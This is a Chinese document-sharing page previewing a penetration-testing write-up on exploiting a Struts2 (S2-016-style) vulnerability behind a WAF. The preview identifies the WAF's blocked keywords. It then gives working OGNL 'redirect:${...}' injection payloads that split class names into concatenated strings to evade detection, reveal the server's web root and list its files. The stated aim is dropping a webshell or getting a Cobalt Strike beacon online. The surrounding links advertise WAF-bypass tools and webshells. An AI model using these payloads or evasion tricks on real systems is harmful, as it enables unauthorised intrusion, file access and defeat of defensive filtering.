没有合适的资源？快使用搜索试试~ 我知道了~

文库首页网络技术网络基础struts2绕过waf读写文件及另类方式执行命令.doc

struts2绕过waf读写文件及另类方式执行命令.doc

1.该资源内容由用户上传，如若侵权请联系客服进行举报
2.虚拟产品一经售出概不退款（资源遇到问题，请及时私信上传者）

版权申诉

技术资料

0 下载量 17 浏览量 2022-07-08 17:52:52 上传评论收藏 12.08MB DOC 举报

温馨提示

试读

17页

struts2绕过waf读写文件及另类方式执行命令.doc

资源推荐

资源详情

资源评论

struts2 绕过 waf 读写文件及另类方式执行命令

之前碰到过好几次 Struts2，还都是 016，项目、众测都遇到过，每次都只是证明了一下存

在，由于 waf 的存在，没有深入去利用，这里简单的记录下。

0x01 背景

xray 或者 Struts2 漏扫可以扫到网站存在 Struts2 漏洞

但是执行命令会发现直接 Connection Reset，很明显是被 waf 拦截了

0x02 探究 waf 规则

一个一个删除关键字，发现拦截的关键字有三个：

Runtime、dispatcher

Runtime 很熟悉，执行命令一般都用这个，拦截了这个关键字，执行命令还是比较困难的

dispatcher 比较陌生，查了资料以后发现是读取 Struts2 的请求对象中的关键字

getRealPath 字面意思，获取真实路径

0x03 尝试突破

简单说一下思路，在绕过 waf 关键字的前提下进行读、写文件，如 webshell 落地；或者

直接执行命令，如 CS 上线等。

dispatcher 绕过

可以通过拼接进行绕过，部分代码如下:

#req=#context.get(‘co’+’m.open’+’symphony.xwo’+’rk2.disp’+’atcher.HttpSer’+’vletReq’+’uest’)

读、写文件绕过

0x001 获取 web 目录

首先要绕过 getRealPath 关键字,可以使用 req.getClass().getResource(“/”).getPath()进行绕过

redirect:${#req=#context.get(‘co’+’m.open’+’symphony.xwo’+’rk2.disp’+’atcher.HttpSer’+’vlet

Req’+’uest’),#resp=#context.get(‘co’+’m.open’+’symphony.xwo’+’rk2.disp’+’atcher.HttpSer’+’v

letRes’+’ponse’),#resp.setCharacterEncoding(‘UTF-8’),#ot=#resp.getWriter

(),#ot.print(‘web’),#ot.print(‘path:’),#ot.print(#req.getClass().getResource(“/”).getPath()),#ot.flush

(),#ot.close()}

0x002 查看目录的文件并列举出来

读取当前目录的第一个文件名，payload 如下：

redirect:http://www.baidu.com${#req=#context.get(‘co’+’m.open’+’symphony.xwo’+’rk2.disp’+’

atcher.HttpSer’+’vletReq’+’uest’),#resp=#context.get(‘co’+’m.open’+’symphony.xwo’+’rk2.disp’

+’atcher.HttpSer’+’vletRes’+’ponse’),#resp.setCharacterEncoding(‘UTF-8’),#ot=#resp.getWriter

(),#ot.print(‘web’),#ot.print(‘path:’),#ot.print(new

java.io.File(#req.getClass().getResource(“/”).getPath()).list()[1]),#ot.flush(),#ot.close()}

这里由于也没有进行深入研究 ognl 的迭代，所以直接在 index 累加了数字，如下：

redirect:http://www.baidu.com${#req=#context.get(‘co’+’m.open’+’symphony.xwo’+’rk2.disp’+’

atcher.HttpSer’+’vletReq’+’uest’),#resp=#context.get(‘co’+’m.open’+’symphony.xwo’+’rk2.disp’

+’atcher.HttpSer’+’vletRes’+’ponse’),#resp.setCharacterEncoding(‘UTF-8’),#ot=#resp.getWriter

(),#ot.print(‘web’),#ot.print(‘path:’),#ot.print(new

java.io.File(#req.getClass().getResource(“/”).getPath()).list()[1]),#ot.print(‘\n’),#ot.print(new

java.io.File(#req.getClass().getResource(“/”).getPath()).list()[2]),#ot.print(‘\n’),#ot.print(new

java.io.File(#req.getClass().getResource(“/”).getPath()).list()[3]),#ot.print(‘\n’),#ot.print(new

java.io.File(#req.getClass().getResource(“/”).getPath()).list()[4]),#ot.print(‘\n’),#ot.print(new

java.io.File(#req.getClass().getResource(“/”).getPath()).list()[5]),#ot.print(‘\n’),#ot.print(new

java.io.File(#req.getClass().getResource(“/”).getPath()).list()[6]),#ot.print(‘\n’),#ot.print(new

java.io.File(#req.getClass().getResource(“/”).getPath()).list()[7]),#ot.flush(),#ot.close()}

剩余16页未读，继续阅读

评论收藏

内容反馈

1.该资源内容由用户上传，如若侵权请联系客服进行举报
2.虚拟产品一经售出概不退款（资源遇到问题，请及时私信上传者）

版权申诉

资源评论

资源反馈

评论星级较低，若资源使用遇到问题可联系上传者，3个工作日内问题未解决可申请退款~

书博教育

粉丝: 1
资源: 2834

上传资源快速赚钱

我的内容管理展开

我的资源快来上传第一个资源

我的收益

登录查看自己的收益

我的积分登录查看自己的积分

我的C币登录后查看C币余额

我的收藏

我的下载

下载帮助

前往需求广场，查看用户热搜

struts2绕过waf读写文件及另类方式执行命令.doc

struts2绕过waf读写文件及另类方式执行命令1

华为WAF5000系列Web应用防火墙技术白皮书.doc

AWD WAF watch bird 文件监控 不死马下载

WAF5000系列Web应用防火墙技术文档.doc

WAF绕过的各种方法总结.pdf

分块绕过WAF.zip

上传绕过WAF的15中姿势

浅谈绕过WAF的数种方法.txt

Struts 2 全版本漏洞检测工具 18.09 过waf版.jar

Struts 2 全版本漏洞检测工具 18.09 过waf版

绕过WAF的另类webshell木马文件测试方法1

WAF网络部署方式.doc

WAF6.X-旁路部署.doc

2015年~4~14web应用防火墙WAF产品白皮书（WAF）.doc

php大马过waf

5.多角度对抗.WAF.的思路与实例.pdf

Struts2_Test17_6.jar

那些年我们绕过的WAF

解决Win 10与不兼容VirtualBox操作过程文档+（附带软件）.zip

计算机网络知识点总结(谢希仁第八版).pdf

最近很火植物大战僵尸杂交版2.08苹果+安卓+PC+防闪退工具V2+修改工具+高清工具+通关存档整合包更新

Xshell软件(配色方案&amp;高亮关键字/突出显示集)的相关文件

湖南科技大学《计算机网络》配套课件（PDF版）

《计算机网络自顶向下方法第7版》中文PDF+复习题问题中文版答案

计算机网络自顶向下方法第八版答案

VRRP实验报告.docx

windows server 2022镜像ISO

hevc视频扩展免费2.0.53348.0x64

最新资源

AWD WAF watch bird 文件监控不死马下载

Xshell软件(配色方案&高亮关键字/突出显示集)的相关文件